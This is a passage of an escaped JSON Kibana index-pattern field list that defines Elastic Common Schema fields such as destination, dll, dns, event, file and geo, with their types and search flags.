readFromDocValues\":true},{\"count\":0,\"name\":\"code_signature.exists\",\"type\":\"boolean\",\"esTypes\":[\"boolean\"],\"scripted\":false,\"searchable\":true,\"aggregatable\":true,\"readFromDocValues\":true},{\"count\":0,\"name\":\"code_signature.status\",\"type\":\"string\",\"esTypes\":[\"keyword\"],\"scripted\":false,\"searchable\":true,\"aggregatable\":true,\"readFromDocValues\":true},{\"count\":0,\"name\":\"code_signature.subject_name\",\"type\":\"string\",\"esTypes\":[\"keyword\"],\"scripted\":false,\"searchable\":true,\"aggregatable\":true,\"readFromDocValues\":true},{\"count\":0,\"name\":\"code_signature.trusted\",\"type\":\"boolean\",\"esTypes\":[\"boolean\"],\"scripted\":false,\"searchable\":true,\"aggregatable\":true,\"readFromDocValues\":true},{\"count\":0,\"name\":\"code_signature.valid\",\"type\":\"boolean\",\"esTypes\":[\"boolean\"],\"scripted\":false,\"searchable\":true,\"aggregatable\":true,\"readFromDocValues\":true},{\"count\":0,\"name\":\"container.id\",\"type\":\"string\",\"esTypes\":[\"keyword\"],\"scripted\":false,\"searchable\":true,\"aggregatable\":true,\"readFromDocValues\":true},{\"count\":0,\"name\":\"container.image.name\",\"type\":\"string\",\"esTypes\":[\"keyword\"],\"scripted\":false,\"searchable\":true,\"aggregatable\":true,\"readFromDocValues\":true},{\"count\":0,\"name\":\"container.image.tag\",\"type\":\"string\",\"esTypes\":[\"keyword\"],\"scripted\":false,\"searchable\":true,\"aggregatable\":true,\"readFromDocValues\":true},{\"count\":0,\"name\":\"container.name\",\"type\":\"string\",\"esTypes\":[\"keyword\"],\"scripted\":false,\"searchable\":true,\"aggregatable\":true,\"readFromDocValues\":true},{\"count\":0,\"name\":\"container.runtime\",\"type\":\"string\",\"esTypes\":[\"keyword\"],\"scripted\":false,\"searchable\":true,\"aggregatable\":true,\"readFromDocValues\":true},{\"count\":0,\"name\":\"destination.address\",\"type\":\"string\",\"esTypes\":[\"keyword\"],\"scripted\":false,\"searchable\":true,\"aggregatable\":true,\"readFromDocValues\":true},{\"count\":0,\"name\":\"destination.as.number\",\"type\":\"number\",\"esTypes\":[\"long\"],\"scripted\":false,\"searchable\":true,\"aggregatable\":true,\"readFromDocValues\":true},{\"count\":0,\"name\":\"destination.as.organization.name\",\"type\":\"string\",\"esTypes\":[\"keyword\"],\"scripted\":false,\"searchable\":true,\"aggregatable\":true,\"readFromDocValues\":true},{\"count\":0,\"name\":\"destination.as.organization.name.text\",\"type\":\"string\",\"esTypes\":[\"text\"],\"scripted\":false,\"searchable\":true,\"aggregatable\":false,\"readFromDocValues\":false,\"subType\":{\"multi\":{\"parent\":\"destination.as.organization.name\"}}},{\"count\":0,\"name\":\"destination.bytes\",\"type\":\"number\",\"esTypes\":[\"long\"],\"scripted\":false,\"searchable\":true,\"aggregatable\":true,\"readFromDocValues\":true},{\"count\":0,\"name\":\"destination.domain\",\"type\":\"string\",\"esTypes\":[\"keyword\"],\"scripted\":false,\"searchable\":true,\"aggregatable\":true,\"readFromDocValues\":true},{\"count\":0,\"name\":\"destination.geo.city_name\",\"type\":\"string\",\"esTypes\":[\"keyword\"],\"scripted\":false,\"searchable\":true,\"aggregatable\":true,\"readFromDocValues\":true},{\"count\":0,\"name\":\"destination.geo.continent_name\",\"type\":\"string\",\"esTypes\":[\"keyword\"],\"scripted\":false,\"searchable\":true,\"aggregatable\":true,\"readFromDocValues\":true},{\"count\":0,\"name\":\"destination.geo.country_iso_code\",\"type\":\"string\",\"esTypes\":[\"keyword\"],\"scripted\":false,\"searchable\":true,\"aggregatable\":true,\"readFromDocValues\":true},{\"count\":0,\"name\":\"destination.geo.country_name\",\"type\":\"string\",\"esTypes\":[\"keyword\"],\"scripted\":false,\"searchable\":true,\"aggregatable\":true,\"readFromDocValues\":true},{\"count\":0,\"name\":\"destination.geo.location\",\"type\":\"geo_point\",\"esTypes\":[\"geo_point\"],\"scripted\":false,\"searchable\":true,\"aggregatable\":true,\"readFromDocValues\":true},{\"count\":0,\"name\":\"destination.geo.name\",\"type\":\"string\",\"esTypes\":[\"keyword\"],\"scripted\":false,\"searchable\":true,\"aggregatable\":true,\"readFromDocValues\":true},{\"count\":0,\"name\":\"destination.geo.region_iso_code\",\"type\":\"string\",\"esTypes\":[\"keyword\"],\"scripted\":false,\"searchable\":true,\"aggregatable\":true,\"readFromDocValues\":true},{\"count\":0,\"name\":\"destination.geo.region_name\",\"type\":\"string\",\"esTypes\":[\"keyword\"],\"scripted\":false,\"searchable\":true,\"aggregatable\":true,\"readFromDocValues\":true},{\"count\":0,\"name\":\"destination.ip\",\"type\":\"ip\",\"esTypes\":[\"ip\"],\"scripted\":false,\"searchable\":true,\"aggregatable\":true,\"readFromDocValues\":true},{\"count\":0,\"name\":\"destination.mac\",\"type\":\"string\",\"esTypes\":[\"keyword\"],\"scripted\":false,\"searchable\":true,\"aggregatable\":true,\"readFromDocValues\":true},{\"count\":0,\"name\":\"destination.nat.ip\",\"type\":\"ip\",\"esTypes\":[\"ip\"],\"scripted\":false,\"searchable\":true,\"aggregatable\":true,\"readFromDocValues\":true},{\"count\":0,\"name\":\"destination.nat.port\",\"type\":\"number\",\"esTypes\":[\"long\"],\"scripted\":false,\"searchable\":true,\"aggregatable\":true,\"readFromDocValues\":true},{\"count\":0,\"name\":\"destination.packets\",\"type\":\"number\",\"esTypes\":[\"long\"],\"scripted\":false,\"searchable\":true,\"aggregatable\":true,\"readFromDocValues\":true},{\"count\":0,\"name\":\"destination.port\",\"type\":\"number\",\"esTypes\":[\"long\"],\"scripted\":false,\"searchable\":true,\"aggregatable\":true,\"readFromDocValues\":true},{\"count\":0,\"name\":\"destination.registered_domain\",\"type\":\"string\",\"esTypes\":[\"keyword\"],\"scripted\":false,\"searchable\":true,\"aggregatable\":true,\"readFromDocValues\":true},{\"count\":0,\"name\":\"destination.top_level_domain\",\"type\":\"string\",\"esTypes\":[\"keyword\"],\"scripted\":false,\"searchable\":true,\"aggregatable\":true,\"readFromDocValues\":true},{\"count\":0,\"name\":\"destination.user.domain\",\"type\":\"string\",\"esTypes\":[\"keyword\"],\"scripted\":false,\"searchable\":true,\"aggregatable\":true,\"readFromDocValues\":true},{\"count\":0,\"name\":\"destination.user.email\",\"type\":\"string\",\"esTypes\":[\"keyword\"],\"scripted\":false,\"searchable\":true,\"aggregatable\":true,\"readFromDocValues\":true},{\"count\":0,\"name\":\"destination.user.full_name\",\"type\":\"string\",\"esTypes\":[\"keyword\"],\"scripted\":false,\"searchable\":true,\"aggregatable\":true,\"readFromDocValues\":true},{\"count\":0,\"name\":\"destination.user.full_name.text\",\"type\":\"string\",\"esTypes\":[\"text\"],\"scripted\":false,\"searchable\":true,\"aggregatable\":false,\"readFromDocValues\":false,\"subType\":{\"multi\":{\"parent\":\"destination.user.full_name\"}}},{\"count\":0,\"name\":\"destination.user.group.domain\",\"type\":\"string\",\"esTypes\":[\"keyword\"],\"scripted\":false,\"searchable\":true,\"aggregatable\":true,\"readFromDocValues\":true},{\"count\":0,\"name\":\"destination.user.group.id\",\"type\":\"string\",\"esTypes\":[\"keyword\"],\"scripted\":false,\"searchable\":true,\"aggregatable\":true,\"readFromDocValues\":true},{\"count\":0,\"name\":\"destination.user.group.name\",\"type\":\"string\",\"esTypes\":[\"keyword\"],\"scripted\":false,\"searchable\":true,\"aggregatable\":true,\"readFromDocValues\":true},{\"count\":0,\"name\":\"destination.user.hash\",\"type\":\"string\",\"esTypes\":[\"keyword\"],\"scripted\":false,\"searchable\":true,\"aggregatable\":true,\"readFromDocValues\":true},{\"count\":0,\"name\":\"destination.user.id\",\"type\":\"string\",\"esTypes\":[\"keyword\"],\"scripted\":false,\"searchable\":true,\"aggregatable\":true,\"readFromDocValues\":true},{\"count\":0,\"name\":\"destination.user.name\",\"type\":\"string\",\"esTypes\":[\"keyword\"],\"scripted\":false,\"searchable\":true,\"aggregatable\":true,\"readFromDocValues\":true},{\"count\":0,\"name\":\"destination.user.name.text\",\"type\":\"string\",\"esTypes\":[\"text\"],\"scripted\":false,\"searchable\":true,\"aggregatable\":false,\"readFromDocValues\":false,\"subType\":{\"multi\":{\"parent\":\"destination.user.name\"}}},{\"count\":0,\"name\":\"dll.code_signature.exists\",\"type\":\"boolean\",\"esTypes\":[\"boolean\"],\"scripted\":false,\"searchable\":true,\"aggregatable\":true,\"readFromDocValues\":true},{\"count\":0,\"name\":\"dll.code_signature.status\",\"type\":\"string\",\"esTypes\":[\"keyword\"],\"scripted\":false,\"searchable\":true,\"aggregatable\":true,\"readFromDocValues\":true},{\"count\":0,\"name\":\"dll.code_signature.subject_name\",\"type\":\"string\",\"esTypes\":[\"keyword\"],\"scripted\":false,\"searchable\":true,\"aggregatable\":true,\"readFromDocValues\":true},{\"count\":0,\"name\":\"dll.code_signature.trusted\",\"type\":\"boolean\",\"esTypes\":[\"boolean\"],\"scripted\":false,\"searchable\":true,\"aggregatable\":true,\"readFromDocValues\":true},{\"count\":0,\"name\":\"dll.code_signature.valid\",\"type\":\"boolean\",\"esTypes\":[\"boolean\"],\"scripted\":false,\"searchable\":true,\"aggregatable\":true,\"readFromDocValues\":true},{\"count\":0,\"name\":\"dll.hash.md5\",\"type\":\"string\",\"esTypes\":[\"keyword\"],\"scripted\":false,\"searchable\":true,\"aggregatable\":true,\"readFromDocValues\":true},{\"count\":0,\"name\":\"dll.hash.sha1\",\"type\":\"string\",\"esTypes\":[\"keyword\"],\"scripted\":false,\"searchable\":true,\"aggregatable\":true,\"readFromDocValues\":true},{\"count\":0,\"name\":\"dll.hash.sha256\",\"type\":\"string\",\"esTypes\":[\"keyword\"],\"scripted\":false,\"searchable\":true,\"aggregatable\":true,\"readFromDocValues\":true},{\"count\":0,\"name\":\"dll.hash.sha512\",\"type\":\"string\",\"esTypes\":[\"keyword\"],\"scripted\":false,\"searchable\":true,\"aggregatable\":true,\"readFromDocValues\":true},{\"count\":0,\"name\":\"dll.name\",\"type\":\"string\",\"esTypes\":[\"keyword\"],\"scripted\":false,\"searchable\":true,\"aggregatable\":true,\"readFromDocValues\":true},{\"count\":0,\"name\":\"dll.path\",\"type\":\"string\",\"esTypes\":[\"keyword\"],\"scripted\":false,\"searchable\":true,\"aggregatable\":true,\"readFromDocValues\":true},{\"count\":0,\"name\":\"dll.pe.company\",\"type\":\"string\",\"esTypes\":[\"keyword\"],\"scripted\":false,\"searchable\":true,\"aggregatable\":true,\"readFromDocValues\":true},{\"count\":0,\"name\":\"dll.pe.description\",\"type\":\"string\",\"esTypes\":[\"keyword\"],\"scripted\":false,\"searchable\":true,\"aggregatable\":true,\"readFromDocValues\":true},{\"count\":0,\"name\":\"dll.pe.file_version\",\"type\":\"string\",\"esTypes\":[\"keyword\"],\"scripted\":false,\"searchable\":true,\"aggregatable\":true,\"readFromDocValues\":true},{\"count\":0,\"name\":\"dll.pe.original_file_name\",\"type\":\"string\",\"esTypes\":[\"keyword\"],\"scripted\":false,\"searchable\":true,\"aggregatable\":true,\"readFromDocValues\":true},{\"count\":0,\"name\":\"dll.pe.product\",\"type\":\"string\",\"esTypes\":[\"keyword\"],\"scripted\":false,\"searchable\":true,\"aggregatable\":true,\"readFromDocValues\":true},{\"count\":0,\"name\":\"dns.answers.class\",\"type\":\"string\",\"esTypes\":[\"keyword\"],\"scripted\":false,\"searchable\":true,\"aggregatable\":true,\"readFromDocValues\":true},{\"count\":0,\"name\":\"dns.answers.data\",\"type\":\"string\",\"esTypes\":[\"keyword\"],\"scripted\":false,\"searchable\":true,\"aggregatable\":true,\"readFromDocValues\":true},{\"count\":0,\"name\":\"dns.answers.name\",\"type\":\"string\",\"esTypes\":[\"keyword\"],\"scripted\":false,\"searchable\":true,\"aggregatable\":true,\"readFromDocValues\":true},{\"count\":0,\"name\":\"dns.answers.ttl\",\"type\":\"number\",\"esTypes\":[\"long\"],\"scripted\":false,\"searchable\":true,\"aggregatable\":true,\"readFromDocValues\":true},{\"count\":0,\"name\":\"dns.answers.type\",\"type\":\"string\",\"esTypes\":[\"keyword\"],\"scripted\":false,\"searchable\":true,\"aggregatable\":true,\"readFromDocValues\":true},{\"count\":0,\"name\":\"dns.header_flags\",\"type\":\"string\",\"esTypes\":[\"keyword\"],\"scripted\":false,\"searchable\":true,\"aggregatable\":true,\"readFromDocValues\":true},{\"count\":0,\"name\":\"dns.id\",\"type\":\"string\",\"esTypes\":[\"keyword\"],\"scripted\":false,\"searchable\":true,\"aggregatable\":true,\"readFromDocValues\":true},{\"count\":0,\"name\":\"dns.op_code\",\"type\":\"string\",\"esTypes\":[\"keyword\"],\"scripted\":false,\"searchable\":true,\"aggregatable\":true,\"readFromDocValues\":true},{\"count\":0,\"name\":\"dns.question.class\",\"type\":\"string\",\"esTypes\":[\"keyword\"],\"scripted\":false,\"searchable\":true,\"aggregatable\":true,\"readFromDocValues\":true},{\"count\":0,\"name\":\"dns.question.name\",\"type\":\"string\",\"esTypes\":[\"keyword\"],\"scripted\":false,\"searchable\":true,\"aggregatable\":true,\"readFromDocValues\":true},{\"count\":0,\"name\":\"dns.question.registered_domain\",\"type\":\"string\",\"esTypes\":[\"keyword\"],\"scripted\":false,\"searchable\":true,\"aggregatable\":true,\"readFromDocValues\":true},{\"count\":0,\"name\":\"dns.question.subdomain\",\"type\":\"string\",\"esTypes\":[\"keyword\"],\"scripted\":false,\"searchable\":true,\"aggregatable\":true,\"readFromDocValues\":true},{\"count\":0,\"name\":\"dns.question.top_level_domain\",\"type\":\"string\",\"esTypes\":[\"keyword\"],\"scripted\":false,\"searchable\":true,\"aggregatable\":true,\"readFromDocValues\":true},{\"count\":0,\"name\":\"dns.question.type\",\"type\":\"string\",\"esTypes\":[\"keyword\"],\"scripted\":false,\"searchable\":true,\"aggregatable\":true,\"readFromDocValues\":true},{\"count\":0,\"name\":\"dns.resolved_ip\",\"type\":\"ip\",\"esTypes\":[\"ip\"],\"scripted\":false,\"searchable\":true,\"aggregatable\":true,\"readFromDocValues\":true},{\"count\":0,\"name\":\"dns.response_code\",\"type\":\"string\",\"esTypes\":[\"keyword\"],\"scripted\":false,\"searchable\":true,\"aggregatable\":true,\"readFromDocValues\":true},{\"count\":0,\"name\":\"dns.type\",\"type\":\"string\",\"esTypes\":[\"keyword\"],\"scripted\":false,\"searchable\":true,\"aggregatable\":true,\"readFromDocValues\":true},{\"count\":0,\"name\":\"ecs.version\",\"type\":\"string\",\"esTypes\":[\"keyword\"],\"scripted\":false,\"searchable\":true,\"aggregatable\":true,\"readFromDocValues\":true},{\"count\":0,\"name\":\"error.code\",\"type\":\"string\",\"esTypes\":[\"keyword\"],\"scripted\":false,\"searchable\":true,\"aggregatable\":true,\"readFromDocValues\":true},{\"count\":0,\"name\":\"error.id\",\"type\":\"string\",\"esTypes\":[\"keyword\"],\"scripted\":false,\"searchable\":true,\"aggregatable\":true,\"readFromDocValues\":true},{\"count\":0,\"name\":\"error.message\",\"type\":\"string\",\"esTypes\":[\"text\"],\"scripted\":false,\"searchable\":true,\"aggregatable\":false,\"readFromDocValues\":false},{\"count\":0,\"name\":\"error.stack_trace\",\"type\":\"string\",\"esTypes\":[\"keyword\"],\"scripted\":false,\"searchable\":false,\"aggregatable\":false,\"readFromDocValues\":false},{\"count\":0,\"name\":\"error.stack_trace.text\",\"type\":\"string\",\"esTypes\":[\"text\"],\"scripted\":false,\"searchable\":true,\"aggregatable\":false,\"readFromDocValues\":false,\"subType\":{\"multi\":{\"parent\":\"error.stack_trace\"}}},{\"count\":0,\"name\":\"error.type\",\"type\":\"string\",\"esTypes\":[\"keyword\"],\"scripted\":false,\"searchable\":true,\"aggregatable\":true,\"readFromDocValues\":true},{\"count\":0,\"name\":\"event.action\",\"type\":\"string\",\"esTypes\":[\"keyword\"],\"scripted\":false,\"searchable\":true,\"aggregatable\":true,\"readFromDocValues\":true},{\"count\":0,\"name\":\"event.category\",\"type\":\"string\",\"esTypes\":[\"keyword\"],\"scripted\":false,\"searchable\":true,\"aggregatable\":true,\"readFromDocValues\":true},{\"count\":0,\"name\":\"event.code\",\"type\":\"string\",\"esTypes\":[\"keyword\"],\"scripted\":false,\"searchable\":true,\"aggregatable\":true,\"readFromDocValues\":true},{\"count\":0,\"name\":\"event.created\",\"type\":\"date\",\"esTypes\":[\"date\"],\"scripted\":false,\"searchable\":true,\"aggregatable\":true,\"readFromDocValues\":true},{\"count\":0,\"name\":\"event.dataset\",\"type\":\"string\",\"esTypes\":[\"keyword\"],\"scripted\":false,\"searchable\":true,\"aggregatable\":true,\"readFromDocValues\":true},{\"count\":0,\"name\":\"event.duration\",\"type\":\"number\",\"esTypes\":[\"long\"],\"scripted\":false,\"searchable\":true,\"aggregatable\":true,\"readFromDocValues\":true},{\"count\":0,\"name\":\"event.end\",\"type\":\"date\",\"esTypes\":[\"date\"],\"scripted\":false,\"searchable\":true,\"aggregatable\":true,\"readFromDocValues\":true},{\"count\":0,\"name\":\"event.hash\",\"type\":\"string\",\"esTypes\":[\"keyword\"],\"scripted\":false,\"searchable\":true,\"aggregatable\":true,\"readFromDocValues\":true},{\"count\":0,\"name\":\"event.id\",\"type\":\"string\",\"esTypes\":[\"keyword\"],\"scripted\":false,\"searchable\":true,\"aggregatable\":true,\"readFromDocValues\":true},{\"count\":0,\"name\":\"event.ingested\",\"type\":\"date\",\"esTypes\":[\"date\"],\"scripted\":false,\"searchable\":true,\"aggregatable\":true,\"readFromDocValues\":true},{\"count\":0,\"name\":\"event.kind\",\"type\":\"string\",\"esTypes\":[\"keyword\"],\"scripted\":false,\"searchable\":true,\"aggregatable\":true,\"readFromDocValues\":true},{\"count\":0,\"name\":\"event.module\",\"type\":\"string\",\"esTypes\":[\"keyword\"],\"scripted\":false,\"searchable\":true,\"aggregatable\":true,\"readFromDocValues\":true},{\"count\":0,\"name\":\"event.original\",\"type\":\"string\",\"esTypes\":[\"keyword\"],\"scripted\":false,\"searchable\":false,\"aggregatable\":false,\"readFromDocValues\":false},{\"count\":0,\"name\":\"event.outcome\",\"type\":\"string\",\"esTypes\":[\"keyword\"],\"scripted\":false,\"searchable\":true,\"aggregatable\":true,\"readFromDocValues\":true},{\"count\":0,\"name\":\"event.provider\",\"type\":\"string\",\"esTypes\":[\"keyword\"],\"scripted\":false,\"searchable\":true,\"aggregatable\":true,\"readFromDocValues\":true},{\"count\":0,\"name\":\"event.reference\",\"type\":\"string\",\"esTypes\":[\"keyword\"],\"scripted\":false,\"searchable\":true,\"aggregatable\":true,\"readFromDocValues\":true},{\"count\":0,\"name\":\"event.risk_score\",\"type\":\"number\",\"esTypes\":[\"float\"],\"scripted\":false,\"searchable\":true,\"aggregatable\":true,\"readFromDocValues\":true},{\"count\":0,\"name\":\"event.risk_score_norm\",\"type\":\"number\",\"esTypes\":[\"float\"],\"scripted\":false,\"searchable\":true,\"aggregatable\":true,\"readFromDocValues\":true},{\"count\":0,\"name\":\"event.sequence\",\"type\":\"number\",\"esTypes\":[\"long\"],\"scripted\":false,\"searchable\":true,\"aggregatable\":true,\"readFromDocValues\":true},{\"count\":0,\"name\":\"event.severity\",\"type\":\"number\",\"esTypes\":[\"long\"],\"scripted\":false,\"searchable\":true,\"aggregatable\":true,\"readFromDocValues\":true},{\"count\":0,\"name\":\"event.start\",\"type\":\"date\",\"esTypes\":[\"date\"],\"scripted\":false,\"searchable\":true,\"aggregatable\":true,\"readFromDocValues\":true},{\"count\":0,\"name\":\"event.timezone\",\"type\":\"string\",\"esTypes\":[\"keyword\"],\"scripted\":false,\"searchable\":true,\"aggregatable\":true,\"readFromDocValues\":true},{\"count\":0,\"name\":\"event.type\",\"type\":\"string\",\"esTypes\":[\"keyword\"],\"scripted\":false,\"searchable\":true,\"aggregatable\":true,\"readFromDocValues\":true},{\"count\":0,\"name\":\"event.url\",\"type\":\"string\",\"esTypes\":[\"keyword\"],\"scripted\":false,\"searchable\":true,\"aggregatable\":true,\"readFromDocValues\":true},{\"count\":0,\"name\":\"file.accessed\",\"type\":\"date\",\"esTypes\":[\"date\"],\"scripted\":false,\"searchable\":true,\"aggregatable\":true,\"readFromDocValues\":true},{\"count\":0,\"name\":\"file.attributes\",\"type\":\"string\",\"esTypes\":[\"keyword\"],\"scripted\":false,\"searchable\":true,\"aggregatable\":true,\"readFromDocValues\":true},{\"count\":0,\"name\":\"file.code_signature.exists\",\"type\":\"boolean\",\"esTypes\":[\"boolean\"],\"scripted\":false,\"searchable\":true,\"aggregatable\":true,\"readFromDocValues\":true},{\"count\":0,\"name\":\"file.code_signature.status\",\"type\":\"string\",\"esTypes\":[\"keyword\"],\"scripted\":false,\"searchable\":true,\"aggregatable\":true,\"readFromDocValues\":true},{\"count\":0,\"name\":\"file.code_signature.subject_name\",\"type\":\"string\",\"esTypes\":[\"keyword\"],\"scripted\":false,\"searchable\":true,\"aggregatable\":true,\"readFromDocValues\":true},{\"count\":0,\"name\":\"file.code_signature.trusted\",\"type\":\"boolean\",\"esTypes\":[\"boolean\"],\"scripted\":false,\"searchable\":true,\"aggregatable\":true,\"readFromDocValues\":true},{\"count\":0,\"name\":\"file.code_signature.valid\",\"type\":\"boolean\",\"esTypes\":[\"boolean\"],\"scripted\":false,\"searchable\":true,\"aggregatable\":true,\"readFromDocValues\":true},{\"count\":0,\"name\":\"file.created\",\"type\":\"date\",\"esTypes\":[\"date\"],\"scripted\":false,\"searchable\":true,\"aggregatable\":true,\"readFromDocValues\":true},{\"count\":0,\"name\":\"file.ctime\",\"type\":\"date\",\"esTypes\":[\"date\"],\"scripted\":false,\"searchable\":true,\"aggregatable\":true,\"readFromDocValues\":true},{\"count\":0,\"name\":\"file.device\",\"type\":\"string\",\"esTypes\":[\"keyword\"],\"scripted\":false,\"searchable\":true,\"aggregatable\":true,\"readFromDocValues\":true},{\"count\":0,\"name\":\"file.directory\",\"type\":\"string\",\"esTypes\":[\"keyword\"],\"scripted\":false,\"searchable\":true,\"aggregatable\":true,\"readFromDocValues\":true},{\"count\":0,\"name\":\"file.drive_letter\",\"type\":\"string\",\"esTypes\":[\"keyword\"],\"scripted\":false,\"searchable\":true,\"aggregatable\":true,\"readFromDocValues\":true},{\"count\":0,\"name\":\"file.extension\",\"type\":\"string\",\"esTypes\":[\"keyword\"],\"scripted\":false,\"searchable\":true,\"aggregatable\":true,\"readFromDocValues\":true},{\"count\":0,\"name\":\"file.gid\",\"type\":\"string\",\"esTypes\":[\"keyword\"],\"scripted\":false,\"searchable\":true,\"aggregatable\":true,\"readFromDocValues\":true},{\"count\":0,\"name\":\"file.group\",\"type\":\"string\",\"esTypes\":[\"keyword\"],\"scripted\":false,\"searchable\":true,\"aggregatable\":true,\"readFromDocValues\":true},{\"count\":0,\"name\":\"file.hash.md5\",\"type\":\"string\",\"esTypes\":[\"keyword\"],\"scripted\":false,\"searchable\":true,\"aggregatable\":true,\"readFromDocValues\":true},{\"count\":0,\"name\":\"file.hash.sha1\",\"type\":\"string\",\"esTypes\":[\"keyword\"],\"scripted\":false,\"searchable\":true,\"aggregatable\":true,\"readFromDocValues\":true},{\"count\":0,\"name\":\"file.hash.sha256\",\"type\":\"string\",\"esTypes\":[\"keyword\"],\"scripted\":false,\"searchable\":true,\"aggregatable\":true,\"readFromDocValues\":true},{\"count\":0,\"name\":\"file.hash.sha512\",\"type\":\"string\",\"esTypes\":[\"keyword\"],\"scripted\":false,\"searchable\":true,\"aggregatable\":true,\"readFromDocValues\":true},{\"count\":0,\"name\":\"file.inode\",\"type\":\"string\",\"esTypes\":[\"keyword\"],\"scripted\":false,\"searchable\":true,\"aggregatable\":true,\"readFromDocValues\":true},{\"count\":0,\"name\":\"file.mime_type\",\"type\":\"string\",\"esTypes\":[\"keyword\"],\"scripted\":false,\"searchable\":true,\"aggregatable\":true,\"readFromDocValues\":true},{\"count\":0,\"name\":\"file.mode\",\"type\":\"string\",\"esTypes\":[\"keyword\"],\"scripted\":false,\"searchable\":true,\"aggregatable\":true,\"readFromDocValues\":true},{\"count\":0,\"name\":\"file.mtime\",\"type\":\"date\",\"esTypes\":[\"date\"],\"scripted\":false,\"searchable\":true,\"aggregatable\":true,\"readFromDocValues\":true},{\"count\":0,\"name\":\"file.name\",\"type\":\"string\",\"esTypes\":[\"keyword\"],\"scripted\":false,\"searchable\":true,\"aggregatable\":true,\"readFromDocValues\":true},{\"count\":0,\"name\":\"file.owner\",\"type\":\"string\",\"esTypes\":[\"keyword\"],\"scripted\":false,\"searchable\":true,\"aggregatable\":true,\"readFromDocValues\":true},{\"count\":0,\"name\":\"file.path\",\"type\":\"string\",\"esTypes\":[\"keyword\"],\"scripted\":false,\"searchable\":true,\"aggregatable\":true,\"readFromDocValues\":true},{\"count\":0,\"name\":\"file.path.text\",\"type\":\"string\",\"esTypes\":[\"text\"],\"scripted\":false,\"searchable\":true,\"aggregatable\":false,\"readFromDocValues\":false,\"subType\":{\"multi\":{\"parent\":\"file.path\"}}},{\"count\":0,\"name\":\"file.pe.company\",\"type\":\"string\",\"esTypes\":[\"keyword\"],\"scripted\":false,\"searchable\":true,\"aggregatable\":true,\"readFromDocValues\":true},{\"count\":0,\"name\":\"file.pe.description\",\"type\":\"string\",\"esTypes\":[\"keyword\"],\"scripted\":false,\"searchable\":true,\"aggregatable\":true,\"readFromDocValues\":true},{\"count\":0,\"name\":\"file.pe.file_version\",\"type\":\"string\",\"esTypes\":[\"keyword\"],\"scripted\":false,\"searchable\":true,\"aggregatable\":true,\"readFromDocValues\":true},{\"count\":0,\"name\":\"file.pe.original_file_name\",\"type\":\"string\",\"esTypes\":[\"keyword\"],\"scripted\":false,\"searchable\":true,\"aggregatable\":true,\"readFromDocValues\":true},{\"count\":0,\"name\":\"file.pe.product\",\"type\":\"string\",\"esTypes\":[\"keyword\"],\"scripted\":false,\"searchable\":true,\"aggregatable\":true,\"readFromDocValues\":true},{\"count\":0,\"name\":\"file.size\",\"type\":\"number\",\"esTypes\":[\"long\"],\"scripted\":false,\"searchable\":true,\"aggregatable\":true,\"readFromDocValues\":true},{\"count\":0,\"name\":\"file.target_path\",\"type\":\"string\",\"esTypes\":[\"keyword\"],\"scripted\":false,\"searchable\":true,\"aggregatable\":true,\"readFromDocValues\":true},{\"count\":0,\"name\":\"file.target_path.text\",\"type\":\"string\",\"esTypes\":[\"text\"],\"scripted\":false,\"searchable\":true,\"aggregatable\":false,\"readFromDocValues\":false,\"subType\":{\"multi\":{\"parent\":\"file.target_path\"}}},{\"count\":0,\"name\":\"file.type\",\"type\":\"string\",\"esTypes\":[\"keyword\"],\"scripted\":false,\"searchable\":true,\"aggregatable\":true,\"readFromDocValues\":true},{\"count\":0,\"name\":\"file.uid\",\"type\":\"string\",\"esTypes\":[\"keyword\"],\"scripted\":false,\"searchable\":true,\"aggregatable\":true,\"readFromDocValues\":true},{\"count\":0,\"name\":\"geo.city_name\",\"type\":\"string\",\"esTypes\":[\"keyword\"],\"scripted\":false,\"searchable\":true,\"aggregatable\":true,\"readFromDocValues\":true},{\"count\":0,\"name\":\"geo.continent_name\",\"type\":\"string\",\"esTypes\":[\"keyword\"],\"scripted\":false,\"searchable\":true,\"aggregatable\":true,\"readFromDocValues\":true},{\"count\":0,\"name\":\"geo.country_iso_code\",\"type\":\"string\",\"esTypes\":[\"keyword\"],\"scripted\":false,\"searchable\":true,\"aggregatable\":true,\"readFromDocValues\":true},{\"count\":0,\"name\":\"geo.country_name\",\"type\":\"string\",\"esTypes\":[\"keyword\"],\"scripted\":false,\"searchable\":true,\"aggregatable\":true,\"readFromDocValues\":true},{\"count\":0,\"name\":\"geo.location\",\"type\":\"geo_point\",\"esTypes\":[\"geo_point\"],\"scripted\":false,\"searchable\":true,\"aggregatable\":true,\"readFromDocValues\":true},{\"count\":0,\"name\":\"geo.name\",\"type\":\"string\",\"esTypes\":[\"keyword\"],\"scripted\":false,\"searchable\":true,\"aggregatable\":true,\"readFromDocValues\":true},{\"count\":0,\"name\":\"geo.region_iso_code\",\"type\":\"string\",\"esTypes\":[\"keyword\"],\"scripted\":false,\"searchable\":true,\"aggregatable\":true,\"readFromDocValues\":true},{\"count\":0,\"name\":\"geo.region_name\",\"type\":\"string\",\"esTypes\":[\"keyword\"],\"scripted\":false,\"searchable\":true,\"aggregatable\":true,\"readFromDocValues\":true},{\"count\":0,\"name\":\"group.domain\",\"type\":\"string\",\"esTypes\":[\"keyword\"],\"scripted\":false,\"searchable\":true,\"aggregatable\":true,\"readFromDocValues\":true},{\"count\":0,\"name\":\"group.id\",\"type\":\"string\",\"esTypes\":[\"keyword\"],\"scripted\":false,\"searchable\":true,\"aggregatable\":true,\"readFromDocValues\":true},{\"count\":0,\"name\":\"group.name\",\"type\":\"string\",\"esTypes\":[\"keyword\"],\"scripted\":false,\"searchable\":true,\"aggregatable\":true,\"readFromDocValues\":true},{\"count\":0,\"name\":\"hash.md5\",\"type\":\"string\",\"esTypes\":[\"keyword\"],\"scripted\":false,\"searchable\":true,\"aggregatable\":true,\"readFromDocValues\":true},{\"count\":0,\"name\":\"hash.sha1\",\"type\":\"string\",\"esTypes\":[\"keyword\"],\"scripted\":false,\"searchable\":true,\"aggregatable\":true,\"readFromDocValues\":true},{\"count\":0,\"name\":\"hash.sha256\",\"type\":\"string\",\"esTypes\":[\"keyword\"],\"scripted\":false,\"searchable\":true,\"aggregatable\":true,\"readFromDocValues\":true},{\"count\":0,\"name\":\"hash.sha512\",\"type\":\"string\",\"esTypes\":[\"keyword\"],\"scripted\":false,\"searchable\":true,\"aggregatable\":true,\"readFromDocValues\":true},{\"count\":0,\"name\":\"host.architecture\",\"type\":\"string\",\"esTypes\":[\"keyword\"],\"scripted\":false,\"searchable\":true,\"aggregatable\":true,\"readFromDocValues\":true},{\"count\":0,\"name\":\"host.domain\",\"type\":\"string\",\"esTypes\":[\"keyword\"],\"scripted\":false,\"